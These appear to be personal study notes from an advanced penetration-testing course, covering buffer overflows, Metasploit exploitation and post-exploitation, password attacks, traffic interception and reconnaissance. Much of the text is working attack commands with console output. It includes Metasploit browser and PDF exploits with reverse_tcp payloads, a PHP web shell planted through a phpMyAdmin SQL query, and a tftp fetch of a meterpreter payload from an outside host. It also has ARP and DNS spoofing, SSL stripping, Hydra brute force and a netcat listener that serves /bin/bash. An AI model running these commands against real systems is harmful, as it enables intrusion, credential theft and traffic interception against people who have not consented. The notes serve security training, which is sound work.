Vitali Kremez

Exploit Development: Fundamentals

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
x86 General Purpose Registers
EIP - instruction pointer
ESP - stack pointer
EBP - base pointer
ESI - source index
EDI - destination index
EAX - accumulator
EBX - base
ECX - counter
EDX - data

Sample of Vulnerable Code (C) overflowtest.c:
#include <stdio.h>
#include <string.h>

/* Never called by the program itself; only reached if the saved return
   address is overwritten to point here. */
void overflowed() {
    printf("%s\n", "Execution Hijacked");
}

/* Vulnerable on purpose: strcpy() has no bounds check, so an argument of
   more than four characters plus the terminating NUL overruns buffer[5]. */
void function1(char *str) {
    char buffer[5];
    strcpy(buffer, str);
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    function1(argv[1]);
    printf("%s\n", "Executed normally");
    return 0;
}

Vulnerability:
(1) strcpy() does not perform bounds checking.
(2) strcpy() is used to copy user input into a fixed-size variable.

Therefore, if we give it more data than the variable can hold, the copy continues into adjacent memory addresses.
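As an added illustration (not part of the course notes), here is a bounds-checked replacement for the strcpy() call in function1() above: the copy is refused when the input plus its NUL would not fit, so the overrun into adjacent memory cannot occur. copy_bounded() and function1_safe() are names chosen here, and the 16-byte default input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 5  /* same fixed size as buffer[5] in function1() */

/* Copy src into dst only if the whole string plus its NUL fits in dst_size
 * bytes. Never reads more than dst_size bytes of src and always leaves dst
 * NUL-terminated. Returns 0 on success, -1 if the input was rejected. */
int copy_bounded(char *dst, size_t dst_size, const char *src) {
    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')   /* bounded length scan */
        len++;
    if (len >= dst_size) {      /* no room left for the terminating NUL */
        dst[0] = '\0';          /* leave dst in a defined state */
        return -1;
    }
    memcpy(dst, src, len + 1);  /* len bytes plus the NUL */
    return 0;
}

/* Hardened counterpart of function1(): same 5-byte local buffer, but the
 * copy cannot run past it. Returns 1 if the input was accepted, 0 if not. */
int function1_safe(const char *str) {
    char buffer[BUF_SIZE];
    return copy_bounded(buffer, sizeof buffer, str) == 0 ? 1 : 0;
}

int main(int argc, char *argv[]) {
    /* Constructed default input: 16 'A's, longer than buffer[5] can hold. */
    const char *input = argc > 1 ? argv[1] : "AAAAAAAAAAAAAAAA";
    if (function1_safe(input))
        printf("Input accepted\n");
    else
        printf("Input rejected: more than %d characters\n", BUF_SIZE - 1);
    return 0;
}
```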


Advanced Penetration Testing: Post Exploitation

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Metasploit Scripts:

msf > use post/windows/gather/enum_logged_on_users

(2) Railgun
Extension for Meterpreter that allows access to the Windows API
meterpreter > irb
>> client.railgun.shell32.IsUserAnAdmin

(3) Local Privilege Escalation: GetSystem
meterpreter > getsystem

(4) Local Privilege Escalation: Local Exploits
msf > use exploit/windows/local/ms11_080_afdjoinleaf
msf exploit(ms11_080_afdjoinleaf) > set payload windows/meterpreter/reverse_tcp

(5) Local Privilege Escalation: Bypassing UAC
msf > use exploit/windows/local/bypassuac

(6) Local Privilege Escalation: Using a Public Exploit
Public exploit in /usr/share/exploitdb


Bypassing Anti-Virus Signature Detection

1/18/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
Trojans:  Bypassing Anti-Virus Signature Detection

Techniques:
1- Binary Embedding
2- Metasploit Encoding
3- Multi-Encoding
4- Combining Techniques
5- Custom Compiling
6- Creating Shellcode
7- Hyperion
8- Veil


Advanced Exploitation

1/17/2016

Course: Georgia Weidman on "Advanced Penetration Testing" at Cybrary
(1) Client Side Exploits

Browser Attacks
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.20.9
SRVHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH aurora
URIPATH => aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.20.9
LHOST => 192.168.20.9
msf exploit(ms10_002_aurora) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.20.9:4444
[*] Using URL: http://192.168.20.9:80/aurora

(2) Automatically Migrating
msf exploit(ms10_002_aurora) > set PrependMigrate true

(3) PDF Exploits
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > show options
msf exploit(adobe_utilprintf) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
msf exploit(adobe_utilprintf) > cp /root/.msf4/local/msf.pdf /var/www
[*] exec: cp /root/.msf4/local/msf.pdf /var/www
msf exploit(adobe_utilprintf) > service apache2 start
[*] exec service apache2 start
Starting web server: apache2.
msf exploit(adobe_utilprintf) > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.20.9:4444



Password Attacks

1/14/2016

Source: Georgia Weidman on "Advanced Penetration Test"

(1) Crunch

Tool to brute-force a keyspace

$: crunch 7 7 AB
Brute-forces all 7-character passwords composed only of the characters A and B

(2) CeWL
Tool to crawl a website and pull potentially interesting words to add to a wordlist

$: cewl -w [words].txt -d 1 -m 5 www.[website].com
Depth 1
Minimum word length is 5 characters

(3) Hydra
Online password cracking tool

$: hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3

Offline Password Attacks


Exploitation

1/14/2016

Source: Georgia Weidman on "Advanced Penetration Test"

(1) WebDAV Default Credentials

Default -> wampp:xampp

a. cadaver http://192.168.0.190/webdav
b. Use msfvenom to create a PHP shell and upload it
c. Use msfconsole to exploit

(2) Open phpMyAdmin
a. Create a PHP shell on the Apache server using a SQL query
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\shell.php"

http://192.168.0.190/shell.php?cmd=ipconfig

b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php


Capturing Traffic

1/13/2016

Source: Georgia Weidman on "Advanced Penetration Test"

(1) ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.20.11 192.168.20.10
arpspoof -i eth0 -t 192.168.20.10 192.168.20.11

(2) Domain Name Service (DNS)
DNS Cache Poisoning
hosts.txt: 192.168.20.9 www.gmail.com
*Restart arpspoof between the gateway and the target
dnsspoof -i eth0 -f hosts.txt

(3) Secure Socket Layer (SSL)
Encrypts traffic between the browser and the web server
Credentials can't be seen in plaintext

SSL Man in the Middle
SSL Stripping

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
Spoof the default gateway with arpspoof
sslstrip -l 8080

Vulnerability Identification

1/13/2016

Source: Georgia Weidman, "Advanced Penetration Test" Cybrary

Query systems for potential vulnerabilities

(1) Nessus
Vulnerability database + scanner 

(2) Nmap Scripting Engine
Vulnerability scripts
Listed in /usr/share/nmap/scripts in Kali 

nmap -sC 172.16.85.135-136
nmap --script-help=smb-check-vulns
nmap --script=nfs-ls 172.16.85.136
nmap --script=smb-os-discovery 172.16.85.136

(3) Metasploit Scanners
auxiliary/scanner/ftp/anonymous

Web Application Scanning

(1) Dirbuster
Graphical tool that is used for bruteforcing directories and pages.

(2) Nikto
Vulnerability database of known website issues
nikto -host http://172.16.85.136

Manual Analysis
*Default passwords - WebDAV
*Misconfigured pages - open phpMyAdmin
*Port 3232 on the Windows system - sensitive web server with directory traversal

Information Gathering

1/13/2016

# Source: Cybrary "Advanced Penetration Test"

*Find as much information as possible about the target.
*What domains do they own? What job ads are they posting? What is their email structure? What technologies are they using on publicly facing systems?

(1) Google Dorks
Database of helpful Google Dorks: http://www.exploit-db.com/google-dorks/
Example: xamppdirpasswd.txt filetype:txt finds xampp passwords

(2) Shodan (Python API)
Search engine that uses banner grabbing

(3) Whois
Domain registration records
root@kali:~# whois ________.com

(4) DNS Recon
root@kali:~# host www.________.com
root@kali:~# host -t ns ________.com
root@kali:~# host -t mx ________.com

*DNS Zone Transfer 
root@kali:~# host -t ns zoneedit.com
root@kali:~# host -l zoneedit.com ns2.zoneedit.com

DNS Bruteforce
root@kali:~# fierce -dns ________.com

(5) Netcraft
http://searchdns.netcraft.com/

(6) theHarvester
theHarvester automatically searches online for email addresses and related information
root@kali:~# theharvester -d ________.com -l 500 -b all



Netcat Shell and Persistence

1/13/2016

# Notes on Cybrary "Advanced Penetration Test"

Opening a command shell listener:
root@kali:~# nc -lvp 1234 -e /bin/bash

Transferring files:
Redirect output to a file:
root@kali:~# nc -lvp 1234 > netcatfile

Send a file from another terminal:
root@kali:~# nc 10.0.0.100 1234 < mydirectory/myfile

Automating Tasks with cron jobs
Add your task to one of the scheduled directories

*For more flexibility, add a line to /etc/crontab